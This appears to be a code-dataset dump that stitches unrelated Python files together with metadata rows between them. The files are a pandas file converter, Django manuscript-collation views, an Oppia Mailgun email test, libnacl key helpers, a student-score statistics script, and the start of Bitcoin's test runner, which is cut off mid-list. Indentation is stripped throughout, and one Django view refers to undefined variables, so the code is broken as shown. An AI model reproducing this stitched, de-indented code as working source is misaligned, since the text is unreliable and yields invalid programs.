f = os.path.expandvars(f)
logger.info('Reading in input file #{} | {} ...'.format(i+1, f))
dfa = pd.read_csv(f, sep=input_sep, low_memory=False)
logger.info('Read {} PSMs'.format(dfa.shape[0]))
# track input file with input id
dfa['input_id'] = i
df = df.append(dfa)
# filter observations
logger.info('Filtering observations...')
# before we filter, assign every row an ID
df['id'] = range(0, df.shape[0])
# by default, exclude nothing. we'll use binary ORs (|) to
# gradually add more and more observations to this exclude blacklist
df['exclude'] = np.repeat(False, df.shape[0])
# run all the filters specified by the list in the input config file
# all filter functions are passed df, and the run configuration
# after each filter, append it onto the exclusion master list with a bitwise OR
# if the filter function returns None, then just ignore it.
for i, f in enumerate(filters):
logger.info('Applying filter #{}: \"{}\"'.format(i+1, f))
e = filters[f](df)
logger.info('Marked {} observations for filtering'.format(np.sum(e)))
if e is not None:
df['exclude'] = (df['exclude'] | e)
logger.info('{} / {} ({:.2%}) observations pass filters'.format(df.shape[0] - df['exclude'].sum(), df.shape[0], (df.shape[0] - df['exclude'].sum()) / df.shape[0]))
# apply exclusion filter
df = df[~df['exclude']].reset_index(drop=True)
# create output frame
df_out = pd.DataFrame()
# apply transformations
logger.info('Transforming data...')
for i, t in enumerate(transformations):
logger.info('Applying transformation #{}: \"{}\"'.format(i+1, t))
trans = transformations[t]
# if transformation is a string, then simply copy the old column
# to the new output one
if type(trans) is str:
df_out[t] = df[trans]
# if transformation is a function, and the transformation name
# begins with a '__', then apply the transformation over the
# entire data frame.
# this is useful for doing matrix maths that spans over multiple
# columns, or rows, or something that involves more than just one
# column.
elif callable(trans) and t[0:2] == '__':
df_out = trans(df, df_out)
# if transformation is a function, then call that function to
# generate the new column for the output
elif callable(trans):
df_out[t] = trans(df, df_out)
# if transformation is a constant number, then just set all values
# of that name to the specified number
# don't have to vectorize, pandas will handle that.
elif type(trans) is int or type(trans) is float:
df_out[t] = trans
else:
raise Exception('Invalid transformation type: {}. Please provide either a string or a function'.format(type(trans)))
# write headers and weights
headers = ''
# column headers
if write_header:
for i, col in enumerate(df_out.columns):
if quoting == csv.QUOTE_ALL or quoting == csv.QUOTE_NONNUMERIC:
headers += ("\"" + col + "\"")
else:
headers += col
if i != (len(df_out.columns)-1):
headers += output_sep
headers += '\n'
# additional header
if 'additional_headers' in globals() and len(additional_headers) > 0:
for i, w in enumerate(additional_headers):
headers += w
if i != (len(weights)-1):
headers += output_sep
headers += '\n'
if output is None:
# if none, then return the dataframe
return (df_out, headers)
else:
if 'sep_by' in globals() and type(sep_by) is str:
# separate output files based on a certain column
if sep_by in df_out.columns:
sep_by_vals = df_out[sep_by]
elif sep_by in df.columns:
sep_by_vals = df[sep_by]
else:
raise Exception('File separator not found in the columns of either the input file or the transformed output file.')
# create the output path if necessary
if not os.path.exists(output):
logger.info('Path for output folder {} does not exist. Creating...'.format(output))
os.makedirs(output)
# get unique categories
cats = np.unique(sep_by_vals)
logger.info('Splitting observations into separate files by "' + sep_by + '"')
logger.info('Categories: [' + ' '.join(cats) + ']')
# iterate over each category
for c in cats:
out_path = os.path.join(output, '{}{}'.format(c, output_type))
logger.info('Saving category file {} to {}'.format(c, out_path))
df_a = df_out.loc[sep_by_vals == c]
write_df_to_file(df_a, headers, out_path)
else:
# if no separation, then write the entire collated df to file
logger.info('Saving combined file to {}'.format(output))
write_df_to_file(df_out, headers, output)
logger.info('Done!')
return None
def main():
# load command-line args
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', action='store_true', default=False,
help='Run in verbose mode. If piping output from stdout to a file, leave this off to exclude all logging messages.')
parser.add_argument('--config-file', required=True, type=str,
help='One of these converters: [' + ' '.join(provided_converters) + '], or a path to conversion configuration script. See list of converters in converters/ folder')
input_group = parser.add_mutually_exclusive_group(required=True)
input_group.add_argument('--input-list', type=argparse.FileType('r', encoding='UTF-8'),
help='List of input files, in YAML format.')
input_group.add_argument('-i', '--input', type=argparse.FileType('r', encoding='UTF-8'),
nargs='+', help='List of input files, separated by spaces.')
parser.add_argument('--version', action='version', version='%(prog)s {version}'.format(version=__version__), help='Display the program\'s version')
parser.add_argument('-o', '--output', type=str,
help='Path to output data. Default: Leave empty to print to stdout')
args = parser.parse_args()
# initialize logger
# set up logger
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
logFormatter = logging.Formatter('%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s')
logger = logging.getLogger('root')
if args.verbose: logger.setLevel(logging.DEBUG)
else: logger.setLevel(logging.WARNING)
"""
if log_to_file:
fileHandler = logging.FileHandler(log_file_path, mode='w')
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)
"""
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
logger.addHandler(consoleHandler)
logger.info(' '.join(sys.argv[0:]))
(df_out, headers) = convert_files(config_file_name=args.config_file, input_list=args.input_list, input_files=args.input, output=args.output)
if args.output is None and df_out is not None:
# if none, then just print to stdout
print(headers, end='')
print(df_out.to_string(header=False, index=write_row_names, sparsify=False))
if __name__ == '__main__':
main() | 35.189189 | 168 | 0.680162 |
da4f9d8b121d836dfaf33e2ca72158e5135e6a9a | 5,491 | py | Python | dcodex_carlson/views.py | rbturnbull/dcodex_carlson | e662e58ad38915b10f079075d69adae463dd7ecd | [
"Apache-2.0"
] | null | null | null | dcodex_carlson/views.py | rbturnbull/dcodex_carlson | e662e58ad38915b10f079075d69adae463dd7ecd | [
"Apache-2.0"
] | null | null | null | dcodex_carlson/views.py | rbturnbull/dcodex_carlson | e662e58ad38915b10f079075d69adae463dd7ecd | [
"Apache-2.0"
] | null | null | null | from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, render
from dcodex.util import get_request_dict
import logging
from .models import *
def index(request):
return HttpResponse("Hello, world. You're at the DCodex Carlson index.")
def location_siglum( request, location_id, siglum_text ):
location = get_object_or_404(Location, id=location_id)
sublocations = location.sublocation_set.all()
siglum = get_object_or_404(Siglum, name=siglum_text)
collation = location.collation_set.first()
siglum = get_object_or_404(Siglum, name=siglum_text)
verse_labels = location.closest_verse_labels().all()
transcription = None
manuscript = None
bible_verse = None
if siglum.witness.manuscript and len(verse_labels) > 0:
manuscript = siglum.witness.manuscript
bible_verse = verse_labels[0].bible_verse()
transcription = manuscript.transcription( bible_verse )
attestation = siglum.witness.get_attestation( sublocation=sublocation, parallel=parallel, corrector=corrector )
return render(request, 'dcodex_carlson/location.html', {'location': location, 'manuscript':manuscript, 'bible_verse':bible_verse, 'transcription':transcription, 'sublocations': sublocations, 'siglum':siglum, 'witness':siglum.witness, 'parallel':None, 'verse_labels':verse_labels,} )
def location_siglum_parallel( request, location_id, siglum_text, parallel_code ):
location = get_object_or_404(Location, id=location_id)
sublocations = location.sublocation_set.all()
siglum = get_object_or_404(Siglum, name=siglum_text)
parallel = get_object_or_404(Parallel, code=parallel_code)
verse_labels = [verse_label for verse_label in location.closest_verse_labels().all() if verse_label.parallel == parallel]
transcription = None
manuscript = None
bible_verse = None
if siglum.witness.manuscript and len(verse_labels) > 0:
manuscript = siglum.witness.manuscript
bible_verse = verse_labels[0].bible_verse()
transcription = manuscript.transcription( bible_verse )
return render(request, 'dcodex_carlson/location.html', {'location': location, 'manuscript':manuscript, 'bible_verse':bible_verse,'transcription':transcription, 'sublocations': sublocations, 'siglum':siglum, 'witness':siglum.witness, 'parallel':parallel, 'verse_labels':verse_labels,} )
def location( request, location_id ):
location = get_object_or_404(Location, id=location_id)
sublocations = location.sublocation_set.all()
return render(request, 'dcodex_carlson/location.html', {'location': location, 'sublocations': sublocations} )
def attestations( request ):
request_dict = get_request_dict(request)
reading_code = request_dict.get('code')
sublocation_id = request_dict.get('sublocation_id')
sublocation = get_object_or_404(SubLocation, id=sublocation_id)
parallels = sublocation.get_parallels()
html = ""
for parallel in parallels:
parallel_switch = ""
if parallel:
parallel_switch = "/%s " % parallel.code
html += "<div>" + str(parallel_switch) + sublocation.code_attestations_string(reading_code, parallel) + "</div>"
return HttpResponse(html)
def set_attestation( request ):
request_dict = get_request_dict(request)
reading_code = request_dict.get('code')
corrector = request_dict.get('corrector')
sublocation_id = request_dict.get('sublocation_id')
sublocation = get_object_or_404(SubLocation, id=sublocation_id)
witness_id = request_dict.get('witness_id')
witness = get_object_or_404(Witness, id=witness_id)
parallel = None
parallel_id = request_dict.get('parallel_id')
parallel_code = request_dict.get('parallel_code')
if parallel_id:
parallel = get_object_or_404(Parallel, id=parallel_id)
elif parallel_code:
parallel = get_object_or_404(Parallel, code=parallel_code)
logger = logging.getLogger(__name__)
logger.error("Parallel in view")
logger.error(parallel)
response = witness.set_attestation( sublocation=sublocation, code=reading_code, parallel=parallel, corrector=corrector )
return HttpResponse("OK" if response else "FAIL")
def set_text( request ):
request_dict = get_request_dict(request)
corrector = request_dict.get('corrector')
sublocation_id = request_dict.get('sublocation_id')
sublocation = get_object_or_404(SubLocation, id=sublocation_id)
witness_id = request_dict.get('witness_id')
witness = get_object_or_404(Witness, id=witness_id)
parallel = None
parallel_id = request_dict.get('parallel_id')
parallel_code = request_dict.get('parallel_code')
if parallel_id:
parallel = get_object_or_404(Parallel, id=parallel_id)
elif parallel_code:
parallel = get_object_or_404(Parallel, code=parallel_code)
logger = logging.getLogger(__name__)
logger.error("Parallel in view")
logger.error(parallel)
attestation = witness.get_attestation( sublocation=sublocation, parallel=parallel, corrector=corrector )
if attestation:
attestation.text = request_dict.get('text')
attestation.save()
return HttpResponse("OK")
return HttpResponse("FAIL")
| 37.101351 | 289 | 0.726097 |
72078488953ec5a998650e2c840d109b1e067013 | 10,255 | py | Python | core/platform/email/mailgun_email_services_test.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | 5 | 2022-01-22T17:22:23.000Z | 2022-02-04T09:21:24.000Z | core/platform/email/mailgun_email_services_test.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | null | null | null | core/platform/email/mailgun_email_services_test.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | 2 | 2022-03-22T16:57:32.000Z | 2022-03-24T17:38:42.000Z | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Mailgun API wrapper."""
from __future__ import annotations
import urllib
from core import feconf
from core import utils
from core.platform.email import mailgun_email_services
from core.tests import test_utils
from typing import Dict, Tuple
MailgunQueryType = Tuple[str, bytes, Dict[str, str]]
class EmailTests(test_utils.GenericTestBase):
"""Tests for sending emails."""
class Response:
"""Class to mock python_utils.url_open responses."""
def __init__(
self, url: MailgunQueryType, expected_url: MailgunQueryType
) -> None:
self.url = url
self.expected_url = expected_url
def getcode(self) -> int:
"""Gets the status code of this url_open mock.
Returns:
int. 200 to signify status is OK. 500 otherwise.
"""
return 200 if self.url == self.expected_url else 500
def test_send_email_to_mailgun(self) -> None:
"""Test for sending HTTP POST request."""
# Test sending email without bcc, reply_to or recipient_variables.
expected_query_url: MailgunQueryType = (
'https://api.mailgun.net/v3/domain/messages',
b'from=a%40a.com&'
b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&'
b'text=plaintext_body+%F0%9F%98%82&'
b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&'
b'to=b%40b.com&'
b'recipient_variables=%7B%7D',
{'Authorization': 'Basic YXBpOmtleQ=='}
)
swapped_urlopen = lambda x: self.Response(x, expected_query_url)
swapped_request = lambda *args: args
swap_urlopen_context = self.swap(
utils, 'url_open', swapped_urlopen)
swap_request_context = self.swap(
urllib.request, 'Request', swapped_request)
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain')
with swap_urlopen_context, swap_request_context, swap_api, swap_domain:
resp = mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂')
self.assertTrue(resp)
# Test sending email with single bcc and single recipient email.
expected_query_url = (
'https://api.mailgun.net/v3/domain/messages',
b'from=a%40a.com&'
b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&'
b'text=plaintext_body+%F0%9F%98%82&'
b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&'
b'to=b%40b.com&'
b'bcc=c%40c.com&'
b'h%3AReply-To=abc&'
b'recipient_variables=%7B%27b%40b.com'
b'%27%3A+%7B%27first%27%3A+%27Bob%27%2C+%27id%27%3A+1%7D%7D',
{'Authorization': 'Basic YXBpOmtleQ=='})
swapped_urlopen = lambda x: self.Response(x, expected_query_url)
swap_urlopen_context = self.swap(
utils, 'url_open', swapped_urlopen)
swap_request_context = self.swap(
urllib.request, 'Request', swapped_request)
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain')
with swap_urlopen_context, swap_request_context, swap_api, swap_domain:
resp = mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂',
bcc=['c@c.com'],
reply_to='abc',
recipient_variables={'b@b.com': {'first': 'Bob', 'id': 1}})
self.assertTrue(resp)
# Test sending email with single bcc, and multiple recipient emails
# differentiated by recipient_variables ids.
expected_query_url = (
'https://api.mailgun.net/v3/domain/messages',
b'from=a%40a.com&'
b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&'
b'text=plaintext_body+%F0%9F%98%82&'
b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&'
b'to=b%40b.com&'
b'bcc=%5B%27c%40c.com%27%2C+%27d%40d.com%27%5D&'
b'h%3AReply-To=abc&'
b'recipient_variables=%7B%27b%40b.com'
b'%27%3A+%7B%27first%27%3A+%27Bob%27%2C+%27id%27%3A+1%7D%7D',
{'Authorization': 'Basic YXBpOmtleQ=='})
swapped_urlopen = lambda x: self.Response(x, expected_query_url)
swap_urlopen_context = self.swap(
utils, 'url_open', swapped_urlopen)
swap_request_context = self.swap(
urllib.request, 'Request', swapped_request)
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain')
with swap_urlopen_context, swap_request_context, swap_api, swap_domain:
resp = mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂',
bcc=['c@c.com', 'd@d.com'],
reply_to='abc',
recipient_variables=({'b@b.com': {'first': 'Bob', 'id': 1}}))
self.assertTrue(resp)
def test_batch_send_to_mailgun(self) -> None:
"""Test for sending HTTP POST request."""
expected_query_url: MailgunQueryType = (
'https://api.mailgun.net/v3/domain/messages',
b'from=a%40a.com&'
b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&'
b'text=plaintext_body+%F0%9F%98%82&'
b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&'
b'to=%5B%27b%40b.com%27%2C+%27c%40c.com%27%2C+%27d%40d.com%27%5D&'
b'recipient_variables=%7B%7D',
{'Authorization': 'Basic YXBpOmtleQ=='})
swapped_urlopen = lambda x: self.Response(x, expected_query_url)
swapped_request = lambda *args: args
swap_urlopen_context = self.swap(
utils, 'url_open', swapped_urlopen)
swap_request_context = self.swap(
urllib.request, 'Request', swapped_request)
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain')
with swap_urlopen_context, swap_request_context, swap_api, swap_domain:
resp = mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com', 'c@c.com', 'd@d.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂')
self.assertTrue(resp)
def test_mailgun_key_or_domain_name_not_set_raises_exception(self) -> None:
"""Test that exceptions are raised when API key or domain name are
unset.
"""
# Testing no mailgun api key.
mailgun_exception = self.assertRaisesRegex( # type: ignore[no-untyped-call]
Exception, 'Mailgun API key is not available.')
with mailgun_exception:
mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com', 'c@c.com', 'd@d.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂')
# Testing no mailgun domain name.
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
mailgun_exception = self.assertRaisesRegex( # type: ignore[no-untyped-call]
Exception, 'Mailgun domain name is not set.')
with swap_api, mailgun_exception:
mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com', 'c@c.com', 'd@d.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂')
def test_invalid_status_code_returns_false(self) -> None:
expected_query_url: MailgunQueryType = (
'https://api.mailgun.net/v3/domain/messages',
b'from=a%40a.com&'
b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&'
b'text=plaintext_body+%F0%9F%98%82&'
b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&'
b'to=%5B%27b%40b.com%27%2C+%27c%40c.com%27%2C+%27d%40d.com%27%5D&'
b'recipient_variables=%7B%7D',
{'Authorization': 'Basic'})
swapped_request = lambda *args: args
swapped_urlopen = lambda x: self.Response(x, expected_query_url)
swap_urlopen_context = self.swap(
utils, 'url_open', swapped_urlopen)
swap_request_context = self.swap(
urllib.request, 'Request', swapped_request)
swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key')
swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain')
with swap_urlopen_context, swap_request_context, swap_api, swap_domain:
resp = mailgun_email_services.send_email_to_recipients(
'a@a.com',
['b@b.com'],
'Hola 😂 - invitation to collaborate',
'plaintext_body 😂',
'Hi abc,<br> 😂',
bcc=['c@c.com', 'd@d.com'],
reply_to='abc',
recipient_variables=({'b@b.com': {'first': 'Bob', 'id': 1}}))
self.assertFalse(resp)
| 44.202586 | 83 | 0.589664 |
e06e07866618de5a5ea2a24026b3f29f2cafe3f8 | 3,027 | py | Python | libnacl/utils.py | jensbjorgensen/libnacl | 390f439ba5e5d5247464dda523c211132cc5faf9 | [
"Apache-2.0"
] | 61 | 2015-01-13T17:50:09.000Z | 2022-02-12T04:32:10.000Z | libnacl/utils.py | jensbjorgensen/libnacl | 390f439ba5e5d5247464dda523c211132cc5faf9 | [
"Apache-2.0"
] | 73 | 2015-01-03T00:52:41.000Z | 2021-07-16T17:28:57.000Z | libnacl/utils.py | jensbjorgensen/libnacl | 390f439ba5e5d5247464dda523c211132cc5faf9 | [
"Apache-2.0"
] | 50 | 2015-01-02T21:07:00.000Z | 2022-02-11T18:15:23.000Z | # -*- coding: utf-8 -*-
import struct
import sys
import time
# Import nacl libs
import libnacl
import libnacl.encode
import libnacl.secret
import libnacl.public
import libnacl.sign
import libnacl.dual
def load_key(path_or_file, serial='json'):
'''
Read in a key from a file and return the applicable key object based on
the contents of the file
'''
if hasattr(path_or_file, 'read'):
stream = path_or_file
else:
if serial == 'json':
stream = open(path_or_file, 'r')
else:
stream = open(path_or_file, 'rb')
try:
if serial == 'msgpack':
import msgpack
key_data = msgpack.load(stream)
elif serial == 'json':
import json
if sys.version_info[0] >= 3:
key_data = json.loads(stream.read())
else:
key_data = json.loads(stream.read(), encoding='UTF-8')
finally:
if stream != path_or_file:
stream.close()
if 'priv' in key_data and 'sign' in key_data and 'pub' in key_data:
return libnacl.dual.DualSecret(
libnacl.encode.hex_decode(key_data['priv']),
libnacl.encode.hex_decode(key_data['sign']))
elif 'priv' in key_data and 'pub' in key_data:
return libnacl.public.SecretKey(
libnacl.encode.hex_decode(key_data['priv']))
elif 'sign' in key_data:
return libnacl.sign.Signer(
libnacl.encode.hex_decode(key_data['sign']))
elif 'pub' in key_data:
return libnacl.public.PublicKey(
libnacl.encode.hex_decode(key_data['pub']))
elif 'verify' in key_data:
return libnacl.sign.Verifier(key_data['verify'])
elif 'priv' in key_data:
return libnacl.secret.SecretBox(
libnacl.encode.hex_decode(key_data['priv']))
raise ValueError('Found no key data')
def salsa_key():
'''
Generates a salsa2020 key
'''
return libnacl.randombytes(libnacl.crypto_secretbox_KEYBYTES)
def aead_key():
'''
Generates an AEAD key (both implementations use the same size)
'''
return libnacl.randombytes(libnacl.crypto_aead_aes256gcm_KEYBYTES)
def rand_aead_nonce():
'''
Generates and returns a random bytestring of the size defined in libsodium
as crypto_aead_aes256gcm_NPUBBYTES and crypto_aead_chacha20poly1305_ietf_NPUBBYTES
'''
return libnacl.randombytes(libnacl.crypto_aead_aes256gcm_NPUBBYTES)
def rand_nonce():
'''
Generates and returns a random bytestring of the size defined in libsodium
as crypto_box_NONCEBYTES
'''
return libnacl.randombytes(libnacl.crypto_box_NONCEBYTES)
def time_nonce():
'''
Generates and returns a nonce as in rand_nonce() but using a timestamp for the first 8 bytes.
This function now exists mostly for backwards compatibility, as rand_nonce() is usually preferred.
'''
nonce = rand_nonce()
return (struct.pack('=d', time.time()) + nonce)[:len(nonce)]
| 29.676471 | 102 | 0.647836 |
134434cd44bf7e46390ab3ce992beb4311c0af5f | 1,415 | py | Python | 013-C109-BellCurve-2/__main__.py | somePythonProgrammer/PythonCode | fb2b2245db631cefd916a960768f411969b0e78f | [
"MIT"
] | 2 | 2021-09-28T13:55:20.000Z | 2021-11-15T10:08:49.000Z | 013-C109-BellCurve-2/__main__.py | somePythonProgrammer/PythonCode | fb2b2245db631cefd916a960768f411969b0e78f | [
"MIT"
] | null | null | null | 013-C109-BellCurve-2/__main__.py | somePythonProgrammer/PythonCode | fb2b2245db631cefd916a960768f411969b0e78f | [
"MIT"
] | 1 | 2022-01-20T03:02:20.000Z | 2022-01-20T03:02:20.000Z | # 013-C109-BellCurve-2
# This is a python script made by @somePythonProgrammer
# for a WhiteHat Junior project.
import pandas as pd
import plotly.figure_factory as ff
import statistics
df = pd.read_csv('013-C109-BellCurve-2/csv/students.csv')
scores = df['math score'].tolist()
mean_ = statistics.mean(scores)
median_ = statistics.median(scores)
mode_ = statistics.mode(scores)
stdev_ = statistics.stdev(scores)
print(f'Mean: {mean_}')
print(f'Median: {median_}')
print(f'Mode: {mode_}')
print(f'Standard Deviation: {stdev_}')
# get percent of values between 1st standard deviation
count = 0
for score in scores:
if score > mean_ - stdev_ and score < mean_ + stdev_:
count += 1
_1perc = (count / len(scores))*100
print('1st Standard Deviation:', _1perc, '%')
# get percent of values between 2nd standard deviation
count = 0
for score in scores:
if score > mean_ - (stdev_ * 2) and score < mean_ + (stdev_ * 2):
count += 1
_2perc = (count / len(scores))*100
print('2nd Standard Deviation:', _2perc, '%')
# get percent of values between 3rd standard deviation
count = 0
for score in scores:
if score > mean_ - (stdev_ * 3) and score < mean_ + (stdev_ * 3):
count += 1
_3perc = (count / len(scores))*100
print('3rd Standard Deviation:', _3perc, '%')
figure = ff.create_distplot([scores], ['Math Scores'])
figure.write_html('013-C109-BellCurve-2/index.html', auto_open=True)
| 29.479167 | 69 | 0.69894 |
6e19e9d0688799f4278e23abcec0825f6d24d98e | 25,319 | py | Python | test/functional/test_runner.py | percussionpc/grovcoina | 900c37d969a8876a66e87e6d94e9c1ec9e847bfe | [
"MIT"
] | null | null | null | test/functional/test_runner.py | percussionpc/grovcoina | 900c37d969a8876a66e87e6d94e9c1ec9e847bfe | [
"MIT"
] | null | null | null | test/functional/test_runner.py | percussionpc/grovcoina | 900c37d969a8876a66e87e6d94e9c1ec9e847bfe | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import signal
import sys
import subprocess
import tempfile
import re
import logging
# Formatting. Default colors to empty strings.
BOLD, GREEN, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name != 'nt' or sys.getwindowsversion() >= (10, 0, 14393):
if os.name == 'nt':
import ctypes
kernel32 = ctypes.windll.kernel32
ENABLE_VIRTUAL_TERMINAL_PROCESSING = 4
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# Enable ascii color control to stdout
stdout = kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
stdout_mode = ctypes.c_int32()
kernel32.GetConsoleMode(stdout, ctypes.byref(stdout_mode))
kernel32.SetConsoleMode(stdout, stdout_mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
# Enable ascii color control to stderr
stderr = kernel32.GetStdHandle(STD_ERROR_HANDLE)
stderr_mode = ctypes.c_int32()
kernel32.GetConsoleMode(stderr, ctypes.byref(stderr_mode))
kernel32.SetConsoleMode(stderr, stderr_mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
GREEN = ('\033[0m', '\033[0;32m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
BASE_SCRIPTS = [
# Scripts that are run by the travis build process.
# Longest test should go first, to favor running tests in parallel
'feature_fee_estimation.py',
'wallet_hd.py',
'wallet_backup.py',
# vv Tests less than 5m vv
'mining_getblocktemplate_longpoll.py',
'feature_maxuploadtarget.py',
'feature_block.py',
'rpc_fundrawtransaction.py',
'p2p_compactblocks.py',
'feature_segwit.py',
# vv Tests less than 2m vv
'wallet_basic.py',
'wallet_labels.py',
'p2p_segwit.py',
'p2p_timeouts.py',
'wallet_dump.py',
'wallet_listtransactions.py',
# vv Tests less than 60s vv
'p2p_sendheaders.py',
'wallet_zapwallettxes.py',
'wallet_importmulti.py',
'mempool_limit.py',
'rpc_txoutproof.py',
'wallet_listreceivedby.py',
'wallet_abandonconflict.py',
'feature_csv_activation.py',
'rpc_rawtransaction.py',
'wallet_address_types.py',
'feature_bip68_sequence.py',
'p2p_feefilter.py',
'feature_reindex.py',
# vv Tests less than 30s vv
'wallet_keypool_topup.py',
'interface_zmq.py',
'interface_bitcoin_cli.py',
'mempool_resurrect.py',
'wallet_txn_doublespend.py --mineblock',
'tool_wallet.py',
'wallet_txn_clone.py',
'wallet_txn_clone.py --segwit',
'rpc_getchaintips.py',
'rpc_misc.py',
'interface_rest.py',
'mempool_spend_coinbase.py',
'mempool_reorg.py',
'mempool_persist.py',
'wallet_multiwallet.py',
'wallet_multiwallet.py --usecli',
'wallet_createwallet.py',
'wallet_createwallet.py --usecli',
'interface_http.py',
'interface_rpc.py',
'rpc_psbt.py',
'rpc_users.py',
'feature_proxy.py',
'rpc_signrawtransaction.py',
'wallet_groups.py',
'p2p_disconnect_ban.py',
'rpc_decodescript.py',
'rpc_blockchain.py',
'rpc_deprecated.py',
'wallet_disable.py',
'rpc_net.py',
'wallet_keypool.py',
'p2p_mempool.py',
'p2p_blocksonly.py',
'mining_prioritisetransaction.py',
'p2p_invalid_locator.py',
'p2p_invalid_block.py',
'p2p_invalid_messages.py',
'p2p_invalid_tx.py',
'feature_assumevalid.py',
'example_test.py',
'wallet_txn_doublespend.py',
'wallet_txn_clone.py --mineblock',
'feature_notifications.py',
'rpc_invalidateblock.py',
'feature_rbf.py',
'mempool_packages.py',
'rpc_createmultisig.py',
'feature_versionbits_warning.py',
'rpc_preciousblock.py',
'wallet_importprunedfunds.py',
'p2p_leak_tx.py',
'rpc_signmessage.py',
'wallet_balance.py',
'feature_nulldummy.py',
'mempool_accept.py',
'wallet_import_rescan.py',
'wallet_import_with_label.py',
'rpc_bind.py --ipv4',
'rpc_bind.py --ipv6',
'rpc_bind.py --nonloopback',
'mining_basic.py',
'wallet_bumpfee.py',
'rpc_named_arguments.py',
'wallet_listsinceblock.py',
'p2p_leak.py',
'wallet_encryption.py',
'wallet_scriptaddress2.py',
'feature_dersig.py',
'feature_cltv.py',
'rpc_uptime.py',
'wallet_resendwallettransactions.py',
'wallet_fallbackfee.py',
'feature_minchainwork.py',
'rpc_getblockstats.py',
'wallet_create_tx.py',
'p2p_fingerprint.py',
'feature_uacomment.py',
'wallet_coinbase_category.py',
'feature_filelock.py',
'p2p_unrequested_blocks.py',
'feature_includeconf.py',
'rpc_deriveaddresses.py',
'rpc_deriveaddresses.py --usecli',
'rpc_scantxoutset.py',
'feature_logging.py',
'p2p_node_network_limited.py',
'feature_blocksdir.py',
'feature_config_args.py',
'rpc_help.py',
'feature_help.py',
'feature_shutdown.py',
# Don't append tests at the end to avoid merge conflicts
# Put them in a random line within the section that fits their approximate run-time
]
EXTENDED_SCRIPTS = [
# These tests are not run by the travis build process.
